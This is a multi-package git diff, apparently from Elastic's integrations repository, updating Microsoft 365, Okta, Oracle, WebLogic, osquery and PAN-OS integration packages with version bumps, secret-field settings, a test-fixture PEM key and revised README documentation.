@@ "id": "o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366", "name": "481f1778-caad-4971-b598-bb61c94bf998:panel_481f1778-caad-4971-b598-bb61c94bf998", "type": "search" + }, + { + "id": "o365-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/o365/kibana/search/o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366.json b/packages/o365/kibana/search/o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366.json index d876845fff0..426453d996d 100644 --- a/packages/o365/kibana/search/o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366.json +++ b/packages/o365/kibana/search/o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366.json @@ -110,12 +110,10 @@ "title": "Data Loss Prevention [Logs o365]", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-11T02:24:40.433Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-25T14:25:10.706Z", "id": "o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366", - "migrationVersion": { - "search": "8.0.0" - }, + "managed": true, "references": [ { "id": "logs-*", @@ -136,7 +134,13 @@ "id": "logs-*", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern" + }, + { + "id": "o365-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "search" + "type": "search", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/o365/kibana/tag/o365-security-solution-default.json b/packages/o365/kibana/tag/o365-security-solution-default.json new file mode 100644 index 00000000000..ad9aed75000 --- /dev/null +++ b/packages/o365/kibana/tag/o365-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#FEC514", + "description": "Tag defined in package-spec", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-24T15:38:38.681Z", + "id": "o365-security-solution-default", + "managed": false, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/o365/manifest.yml b/packages/o365/manifest.yml index 076a543c347..eef70a8acc9 100644 --- a/packages/o365/manifest.yml +++ b/packages/o365/manifest.yml @@ -1,13 +1,13 @@ name: o365 title: Microsoft 365 -version: "2.2.0" +version: "2.3.2" description: Collect logs from Microsoft 365 with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, productivity_security] conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 icons: - src: /img/logo-integrations-microsoft-365.svg title: Microsoft Office 365 diff --git a/packages/okta/changelog.yml b/packages/okta/changelog.yml index f8a2fc2f5d0..d7ed764ca83 100644 --- a/packages/okta/changelog.yml +++ b/packages/okta/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.9.0" + changes: + - description: Allow private key to be supplied as a PEM block. + type: enhancement + link: https://github.com/elastic/integrations/pull/9291 +- version: "2.8.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "2.7.1" changes: - description: Changed owners diff --git a/packages/okta/data_stream/system/_dev/test/system/test-oauth2-pem-config.yml b/packages/okta/data_stream/system/_dev/test/system/test-oauth2-pem-config.yml new file mode 100644 index 00000000000..8093eed1d21 --- /dev/null +++ b/packages/okta/data_stream/system/_dev/test/system/test-oauth2-pem-config.yml @@ -0,0 +1,45 @@ +input: httpjson +service: okta-oauth2 +vars: + url: http://{{Hostname}}:{{Port}}/api/v1/logs + interval: 10s + enable_request_tracer: true + okta_domain_url: http://{{Hostname}}:{{Port}} + client_id: 0oaajljpeokFZLyKU5d7 + okta_scopes: + - okta.logs.read + key_pem: | + -----BEGIN PRIVATE KEY----- + MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCOuef3HMRhohVT + 5kSoAJgV+atpDjkwTwkOq+ImnbBlv75GaApG90w8VpjXjhqN/1KJmwfyrKiquiMq + OPu+o/672Dys5rUAaWSbT7wRF1GjLDDZrM0GHRdV4DGxM/LKI8I5yE1Mx3EzV+D5 + ZLmcRc5U4oEoMwtGpr0zRZ7uUr6a28UQwcUsVIPItc1/9rERlo1WTv8dcaj4ECC3 + 2Sc0y/F+9XqwJvLd4Uv6ckzP0Sv4tbDA+7jpD9MneAIUiZ4LVj2cwbBd+YRY6jXx + MkevcCSmSX60clBY1cIFkw1DYHqtdHEwAQcQHLGMoi72xRP2qrdzIPsaTKVYoHVo + WA9vADdHAgMBAAECggEAIlx7jjCsztyYyeQsL05FTzUWoWo9NnYwtgmHnshkCXsK + MiUmJEOxZO1sSqj5l6oakupyFWigCspZYPbrFNCiqVK7+NxqQzkccY/WtT6p9uDS + ufUyPwCN96zMCd952lSVlBe3FH8Hr9a+YQxw60CbFjCZ67WuR0opTsi6JKJjJSDb + TQQZ4qJR97D05I1TgfmO+VO7G/0/dDaNHnnlYz0AnOgZPSyvrU2G5cYye4842EMB + ng81xjHD+xp55JNui/xYkhmYspYhrB2KlEjkKb08OInUjBeaLEAgA1r9yOHsfV/3 + DQzDPRO9iuqx5BfJhdIqUB1aifrye+sbxt9uMBtUgQKBgQDVdfO3GYT+ZycOQG9P + QtdMn6uiSddchVCGFpk331u6M6yafCKjI/MlJDl29B+8R5sVsttwo8/qnV/xd3cn + pY14HpKAsE4l6/Ciagzoj+0NqfPEDhEzbo8CyArcd7pSxt3XxECAfZe2+xivEPHe + gFO60vSFjFtvlLRMDMOmqX3kYQKBgQCrK1DISyQTnD6/axsgh2/ESOmT7n+JRMx/ + YzA7Lxu3zGzUC8/sRDa1C41t054nf5ZXJueYLDSc4kEAPddzISuCLxFiTD2FQ75P + lHWMgsEzQObDm4GPE9cdKOjoAvtAJwbvZcjDa029CDx7aCaDzbNvdmplZ7EUrznR + 55U8Wsm8pwKBgBytxTmzZwfbCgdDJvFKNKzpwuCB9TpL+v6Y6Kr2Clfg+26iAPFU + MiWqUUInGGBuamqm5g6jI5sM28gQWeTsvC4IRXyes1Eq+uCHSQax15J/Y+3SSgNT + 9kjUYYkvWMwoRcPobRYWSZze7XkP2L8hFJ7EGvAaZGqAWxzgliS9HtnhAoGAONZ/ + UqMw7Zoac/Ga5mhSwrj7ZvXxP6Gqzjofj+eKqrOlB5yMhIX6LJATfH6iq7cAMxxm + Fu/G4Ll4oB3o5wACtI3wldV/MDtYfJBtoCTjBqPsfNOsZ9hMvBATlsc2qwzKjsAb + tFhzTevoOYpSD75EcSS/G8Ec2iN9bagatBnpl00CgYBVqAOFZelNfP7dj//lpk8y + EUAw7ABOq0S9wkpFWTXIVPoBQUipm3iAUqGNPmvr/9ShdZC9xeu5AwKram4caMWJ + ExRhcDP1hFM6CdmSkIYEgBKvN9N0O4Lx1ba34gk74Hm65KXxokjJHOC0plO7c7ok + LNV/bIgMHOMoxiGrwyjAhg== + -----END PRIVATE KEY----- +policy_template: okta +data_stream: + vars: + preserve_original_event: true +assert: + hit_count: 4 diff --git a/packages/okta/data_stream/system/agent/stream/httpjson.yml.hbs b/packages/okta/data_stream/system/agent/stream/httpjson.yml.hbs index 1804f77b9b0..467ff8b64a9 100644 --- a/packages/okta/data_stream/system/agent/stream/httpjson.yml.hbs +++ b/packages/okta/data_stream/system/agent/stream/httpjson.yml.hbs @@ -33,6 +33,9 @@ auth.oauth2.okta.jwk_json: {{jwk_json}} {{#if jwk_file}} auth.oauth2.okta.jwk_file: {{jwk_file}} {{/if}} +{{#if key_pem}} +auth.oauth2.okta.jwk_pem: {{escape_string key_pem}} +{{/if}} {{/if}} {{/if}} {{/unless}} diff --git a/packages/okta/manifest.yml b/packages/okta/manifest.yml index ae2dbab6f26..ae6f311df26 100644 --- a/packages/okta/manifest.yml +++ b/packages/okta/manifest.yml @@ -1,13 +1,13 @@ name: okta title: Okta -version: "2.7.1" +version: "2.9.0" description: Collect and parse event logs from Okta API with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, iam] conditions: kibana: - version: ^8.10.1 + version: ^8.13.0 icons: - src: /img/okta-logo.svg title: Okta @@ -56,33 +56,54 @@ policy_templates: show_user: true description: This is the URL of your Okta System Log API. For example, https://dev-123456.okta.com/api/v1/logs. - name: api_key - type: text + type: password title: API Key multi: false required: false show_user: true - description: "This is the API Key of your Okta service application. This is only required for the standard api key based authentication. \nDo not use this field if you are using OAuth2 authentication.\n" + description: | + This is the API Key of your Okta service application. This is only required for the standard api key based authentication. + Do not use this field if you are using OAuth2 authentication. + secret: true - name: okta_domain_url type: text title: Okta Domain URL multi: false required: false show_user: true - description: "This is the URL of your Okta domain. For example, https://dev-123456.okta.com. \nThis is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication.\n" + description: | + This is the URL of your Okta domain. For example, https://dev-123456.okta.com. + This is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication. - name: client_id type: text title: Client ID multi: false required: false show_user: true - description: "This is the Client ID of your Okta service application. This is only required for OAuth2 authentication. \nDo not use this field if you are using API Key based authentication.\n" + description: | + This is the Client ID of your Okta service application. This is only required for OAuth2 authentication. + Do not use this field if you are using API Key based authentication. - name: jwk_json type: password title: JWK JSON multi: false required: false show_user: true - description: "This is the private JSON Web Key (JWK) of your Okta service application. \nThis is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication.\n" + description: | + This is the private JSON Web Key (JWK) of your Okta service application. + This is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication. + Only one of JWK JSON, PEM Encoded Key or JWK File may be used. + secret: true + - name: key_pem + type: textarea + title: PEM Encoded Key + multi: false + required: false + show_user: true + description: | + This is the private key of your Okta service application in PEM format. + This is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication. + Only one of JWK JSON, PEM Encoded Key or JWK File may be used. - name: jwk_file type: text title: JWK File @@ -92,6 +113,7 @@ policy_templates: description: | This is the path to the file containing the private JSON Web Key (JWK) of your Okta service application. This is only required for OAuth2 authentication. Do not use this field if you are using API Key based authentication. + Only one of JWK JSON, PEM Encoded Key or JWK File may be used. - name: okta_scopes type: text title: Okta Scopes diff --git a/packages/oracle/_dev/build/docs/README.md b/packages/oracle/_dev/build/docs/README.md index 7642d345a48..a0d6e9d1944 100644 --- a/packages/oracle/_dev/build/docs/README.md +++ b/packages/oracle/_dev/build/docs/README.md @@ -62,13 +62,23 @@ Then, Metricbeat can be launched. ### Oracle DSN Configuration -The supported configuration takes one of the forms -- `oracle://:@` -- `:@` +The following two configuration formats are supported: +``` +oracle://:@ +user="" password="" connectString="" sysdba= +``` -Examples of supported configurations are as below: -- `oracle://sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1` -- `sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1` +Example values are: +``` +oracle://sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1 +user="sys" password="Oradoc_db1" connectString="0.0.0.0:1521/ORCLCDB.localdomain" sysdba=true +``` + +In the first, URL-based format, special characters should be URL encoded. + +In the seoncd, logfmt-encoded DSN format, if the password contains a backslash +character (`\`), it must be escaped with another backslash. For example, if the +password is `my\_password`, it must be written as `my\\_password`. ## Compatibility @@ -86,13 +96,23 @@ The `database_audit` dataset collects Oracle Audit logs. Tablespace metrics describes the tablespace usage metrics of all types of tablespaces in the oracle database. +To collect the Tablespace metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `SYS.DBA_DATA_FILES` +- `SYS.DBA_TEMP_FILES` +- `DBA_FREE_SPACE` + {{fields "tablespace"}} {{event "tablespace"}} ### Sysmetrics -The system metrics value captured for the most current time interval for the long duration (60-seconds) are mentioned below +The system metrics value captured for the most current time interval for the long duration (60-seconds) are listed in the following table. + +To collect the Sysmetrics metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following view: + +- `V$SYSMETRIC` {{fields "sysmetric"}} @@ -102,6 +122,11 @@ The system metrics value captured for the most current time interval for the lon A Program Global Area (PGA) is a memory region that contains data and control information for a server process. It is nonshared memory created by Oracle Database when a server process is started. Access to the PGA is exclusive to the server process. Metrics concerning Program Global Area (PGA) memory are mentioned below. +To collect the Memory metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `V$SGASTAT` +- `V$PGASTAT` + {{fields "memory"}} {{event "memory"}} @@ -110,6 +135,10 @@ A Program Global Area (PGA) is a memory region that contains data and control in The System Global Area (SGA) is a group of shared memory structures that contain data and control information for one Oracle Database instance. Metrics concerning System Global Area (SGA) memory are mentioned below. +To collect the System Statistics metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following view: + +- `V$SYSSTAT` + {{fields "system_statistics"}} {{event "system_statistics"}} @@ -118,6 +147,16 @@ The System Global Area (SGA) is a group of shared memory structures that contain Performance metrics give an overview of where time is spent in the system and enable comparisons of wait times across the system. +To collect the Performance metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `V$BUFFER_POOL_STATISTICS` +- `V$SESSTAT` +- `V$SYSSTAT` +- `V$LIBRARYCACHE` +- `DBA_JOBS` +- `GV$SESSION` +- `V$SYSTEM_WAIT_CLASS` + {{fields "performance"}} {{event "performance"}} diff --git a/packages/oracle/changelog.yml b/packages/oracle/changelog.yml index 5ac6c63966f..2fefb5dcdd2 100644 --- a/packages/oracle/changelog.yml +++ b/packages/oracle/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: 1.24.3 + changes: + - description: README updates regarding mandatory user permission. + type: bugfix + link: https://github.com/elastic/integrations/pull/9104 +- version: 1.24.2 + changes: + - description: README updates regarding DSN formats. + type: bugfix + link: https://github.com/elastic/integrations/pull/8841 - version: 1.24.1 changes: - description: Make Oracle DSN configuration details more discoverable. diff --git a/packages/oracle/docs/README.md b/packages/oracle/docs/README.md index d949a808260..12e9b488708 100644 --- a/packages/oracle/docs/README.md +++ b/packages/oracle/docs/README.md @@ -62,13 +62,23 @@ Then, Metricbeat can be launched. ### Oracle DSN Configuration -The supported configuration takes one of the forms -- `oracle://:@` -- `:@` +The following two configuration formats are supported: +``` +oracle://:@ +user="" password="" connectString="" sysdba= +``` + +Example values are: +``` +oracle://sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1 +user="sys" password="Oradoc_db1" connectString="0.0.0.0:1521/ORCLCDB.localdomain" sysdba=true +``` + +In the first, URL-based format, special characters should be URL encoded. -Examples of supported configurations are as below: -- `oracle://sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1` -- `sys:Oradoc_db1@0.0.0.0:1521/ORCLCDB.localdomain?sysdba=1` +In the seoncd, logfmt-encoded DSN format, if the password contains a backslash +character (`\`), it must be escaped with another backslash. For example, if the +password is `my\_password`, it must be written as `my\\_password`. ## Compatibility @@ -311,6 +321,12 @@ An example event for `database_audit` looks as following: Tablespace metrics describes the tablespace usage metrics of all types of tablespaces in the oracle database. +To collect the Tablespace metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `SYS.DBA_DATA_FILES` +- `SYS.DBA_TEMP_FILES` +- `DBA_FREE_SPACE` + **Exported fields** | Field | Description | Type | Unit | Metric Type | @@ -466,7 +482,11 @@ An example event for `tablespace` looks as following: ### Sysmetrics -The system metrics value captured for the most current time interval for the long duration (60-seconds) are mentioned below +The system metrics value captured for the most current time interval for the long duration (60-seconds) are listed in the following table. + +To collect the Sysmetrics metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following view: + +- `V$SYSMETRIC` **Exported fields** @@ -909,6 +929,11 @@ An example event for `sysmetric` looks as following: A Program Global Area (PGA) is a memory region that contains data and control information for a server process. It is nonshared memory created by Oracle Database when a server process is started. Access to the PGA is exclusive to the server process. Metrics concerning Program Global Area (PGA) memory are mentioned below. +To collect the Memory metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `V$SGASTAT` +- `V$PGASTAT` + **Exported fields** | Field | Description | Type | Unit | Metric Type | @@ -1054,6 +1079,10 @@ An example event for `memory` looks as following: The System Global Area (SGA) is a group of shared memory structures that contain data and control information for one Oracle Database instance. Metrics concerning System Global Area (SGA) memory are mentioned below. +To collect the System Statistics metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following view: + +- `V$SYSSTAT` + **Exported fields** | Field | Description | Type | Unit | Metric Type | @@ -1331,6 +1360,16 @@ An example event for `system_statistics` looks as following: Performance metrics give an overview of where time is spent in the system and enable comparisons of wait times across the system. +To collect the Performance metrics, Oracle integration relies on a specific set of views. Make sure that the user configured within the Oracle DSN configuration has `READ` access permissions to the following views: + +- `V$BUFFER_POOL_STATISTICS` +- `V$SESSTAT` +- `V$SYSSTAT` +- `V$LIBRARYCACHE` +- `DBA_JOBS` +- `GV$SESSION` +- `V$SYSTEM_WAIT_CLASS` + **Exported fields** | Field | Description | Type | Unit | Metric Type | diff --git a/packages/oracle/manifest.yml b/packages/oracle/manifest.yml index b399631bec8..cd32ed2a9f3 100644 --- a/packages/oracle/manifest.yml +++ b/packages/oracle/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: oracle title: "Oracle" -version: "1.24.1" +version: "1.24.3" description: Collect Oracle Audit Log, Performance metrics, Tablespace metrics, Sysmetrics metrics, System statistics metrics, memory metrics from Oracle database. type: integration categories: diff --git a/packages/oracle_weblogic/_dev/build/docs/README.md b/packages/oracle_weblogic/_dev/build/docs/README.md index 911da813801..f000dae45f8 100644 --- a/packages/oracle_weblogic/_dev/build/docs/README.md +++ b/packages/oracle_weblogic/_dev/build/docs/README.md @@ -34,99 +34,8 @@ In order to ingest data from Oracle WebLogic: ``` ### Troubleshooting -Conflicts in any field in any data stream can be solved by reindexing the data. -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Admin Server`` data stream's indices. -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by reindexing the ``Deployed Application`` and ``Threadpool`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Oracle WebLogic -> Integration policies` open the configuration of Oracle WebLogic and disable the `Collect Oracle WebLogic metrics` toggle to reindex metrics data stream and disable the `Collect Oracle WebLogic logs` toggle to reindex logs data stream and save the integration. - -2. Perform the following steps in the Dev tools - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-oracle_weblogic.admin_server-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-oracle_weblogic.admin_server-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-oracle_weblogic.admin_server -``` -3. Go to `Integrations -> Oracle WebLogic -> Settings` and click on `Reinstall Oracle WebLogic`. - -4. Perform the following steps in the Dev tools - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-oracle_weblogic.admin_server-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> Oracle WebLogic -> Integration policies` and open configuration of integration and enable the `Collect Oracle WebLogic metrics` toggle and enable the `Collect Oracle WebLogic logs` toggle save the integration. - -7. Perform the following step in the Dev tools - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Admin Server`` data stream. +- If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Deployed Application`` and ``Threadpool`` data streams. ## Logs diff --git a/packages/oracle_weblogic/changelog.yml b/packages/oracle_weblogic/changelog.yml index 02bf8180650..8b22c4e83e3 100644 --- a/packages/oracle_weblogic/changelog.yml +++ b/packages/oracle_weblogic/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.5.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: "1.5.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.4.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.4.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.3.1" changes: - description: Fixed Admin Server, Managed Server and Domain Logs visualization. diff --git a/packages/oracle_weblogic/docs/README.md b/packages/oracle_weblogic/docs/README.md index 5ed87f06644..014612aa308 100644 --- a/packages/oracle_weblogic/docs/README.md +++ b/packages/oracle_weblogic/docs/README.md @@ -34,99 +34,8 @@ In order to ingest data from Oracle WebLogic: ``` ### Troubleshooting -Conflicts in any field in any data stream can be solved by reindexing the data. -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Admin Server`` data stream's indices. -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by reindexing the ``Deployed Application`` and ``Threadpool`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Oracle WebLogic -> Integration policies` open the configuration of Oracle WebLogic and disable the `Collect Oracle WebLogic metrics` toggle to reindex metrics data stream and disable the `Collect Oracle WebLogic logs` toggle to reindex logs data stream and save the integration. - -2. Perform the following steps in the Dev tools - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-oracle_weblogic.admin_server-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-oracle_weblogic.admin_server-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-oracle_weblogic.admin_server -``` -3. Go to `Integrations -> Oracle WebLogic -> Settings` and click on `Reinstall Oracle WebLogic`. - -4. Perform the following steps in the Dev tools - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-oracle_weblogic.admin_server-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> Oracle WebLogic -> Integration policies` and open configuration of integration and enable the `Collect Oracle WebLogic metrics` toggle and enable the `Collect Oracle WebLogic logs` toggle save the integration. - -7. Perform the following step in the Dev tools - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Admin Server`` data stream. +- If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Deployed Application`` and ``Threadpool`` data streams. ## Logs diff --git a/packages/oracle_weblogic/manifest.yml b/packages/oracle_weblogic/manifest.yml index a3a27b6b6b0..f41ed675d2b 100644 --- a/packages/oracle_weblogic/manifest.yml +++ b/packages/oracle_weblogic/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: oracle_weblogic title: Oracle WebLogic -version: "1.3.1" +version: "1.5.1" description: Collect logs and metrics from Oracle WebLogic with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -54,6 +54,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/osquery/changelog.yml b/packages/osquery/changelog.yml index e84b855b072..83e2b5f41b9 100644 --- a/packages/osquery/changelog.yml +++ b/packages/osquery/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.19.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.18.2" changes: - description: Changed owners diff --git a/packages/osquery/manifest.yml b/packages/osquery/manifest.yml index bec77d06a4c..3a836d763d8 100644 --- a/packages/osquery/manifest.yml +++ b/packages/osquery/manifest.yml @@ -1,6 +1,6 @@ name: osquery title: Osquery Logs -version: "1.18.2" +version: "1.19.0" description: Collect logs from Osquery with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: logo osquery size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: - security conditions: diff --git a/packages/panw/_dev/build/docs/README.md b/packages/panw/_dev/build/docs/README.md index c84d41ff7a4..dc063bc47f4 100644 --- a/packages/panw/_dev/build/docs/README.md +++ b/packages/panw/_dev/build/docs/README.md @@ -12,6 +12,8 @@ This integration is for Palo Alto Networks PAN-OS firewall monitoring logs recei - This integration supports logs of Tunnel Inspection for PAN-OS version 9.1 or above. +- This integration supports logs of configuration changes with and without details about the changed configuration(`before-change-detail` and `after-change-detail`). Please read [Note](#note) for more details. + - This module has been tested with logs generated by devices running PAN-OS versions 7.1 to 11.0. ## Configurations @@ -23,6 +25,8 @@ To configure syslog monitoring, please follow the steps mentioned in the [_Confi - It can be found under Advanced Options and can be configured as per requirements. The default value of `max_message_size` is set to 50KiB. - If the TCP input is used, it is recommended that PAN-OS is configured to send syslog messages using the IETF (RFC 5424) format. In addition, RFC 6587 framing (Octet Counting) will be enabled by default on the TCP input. +- If you want to see the configuration before and after the change(fields `before-change-detail` and `after-change-detail`) in the [config-log](https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-admin/monitoring/use-syslog-for-monitoring/syslog-field-descriptions/config-log-fields), please use the following [custom log format in the syslog server profile](https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-admin/monitoring/use-syslog-for-monitoring/syslog-field-descriptions/custom-logevent-format): + ``1,$receive_time,$serial,$type,$subtype,2561,$time_generated,$host,$vsys,$cmd,$admin,$client,$result,$path,$before-change-detail,$after-change-detail,$seqno,$actionflags,$dg_hier_level_1,$dg_hier_level_2,$dg_hier_level_3,$dg_hier_level_4,$vsys_name,$device_name,$dg_id,$comment,0,$high_res_timestamp`` ## Logs diff --git a/packages/panw/changelog.yml b/packages/panw/changelog.yml index c18a716a817..7e9c26ed84a 100644 --- a/packages/panw/changelog.yml +++ b/packages/panw/changelog.yml @@ -1,4 +1,34 @@ # newer versions go on top +- version: "3.24.2" + changes: + - description: Prevent denied duplication in event.type + type: bugfix + link: https://github.com/elastic/integrations/pull/9538 +- version: "3.24.1" + changes: + - description: fixed parsing of hostnames and usernames to accept additional characters + type: bugfix + link: https://github.com/elastic/integrations/pull/9479 +- version: "3.24.0" + changes: + - description: fixed parsing of usernames and domains(src+dst) to allow shortened domains("nt-auth...t"), domains that only contain a "." and usernames that contain ":". Also fixed the parsing of custom config-log-format. + type: enhancement + link: https://github.com/elastic/integrations/pull/9247 +- version: "3.23.1" + changes: + - description: Ensure empty NAT IP is not appended to related items. + type: bugfix + link: https://github.com/elastic/integrations/pull/9333 +- version: "3.23.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "3.22.0" + changes: + - description: Add session.start_time for ML jobs + type: enhancement + link: https://github.com/elastic/integrations/pull/9154 - version: "3.21.2" changes: - description: Changed owners diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log index d26db7926c0..6da40e01690 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log @@ -3,3 +3,4 @@ 1,2023/10/04 08:52:10,007058000248010,CONFIG,0,2816,2023/10/04 08:52:10,81.2.69.193,,set,admin,Web,Succeeded, vsys vsys1 rulebase security rules reset-adult,,reset-adult 73a06abf-75ca-436f-9319-1a15b27fa692 { to [ public ]; from [ private ]; source [ any ]; destination [ any ]; source-user [ any ]; category [ adult ]; application [ any ]; service [ application-default ]; source-hip [ any ]; destination-hip [ any ]; action reset-client; icmp-unreachable yes; log-start yes; rule-type interzone; } ,7286123782408765488,0x0,0,0,0,0,,PA-VM,0, 1,2023/10/04 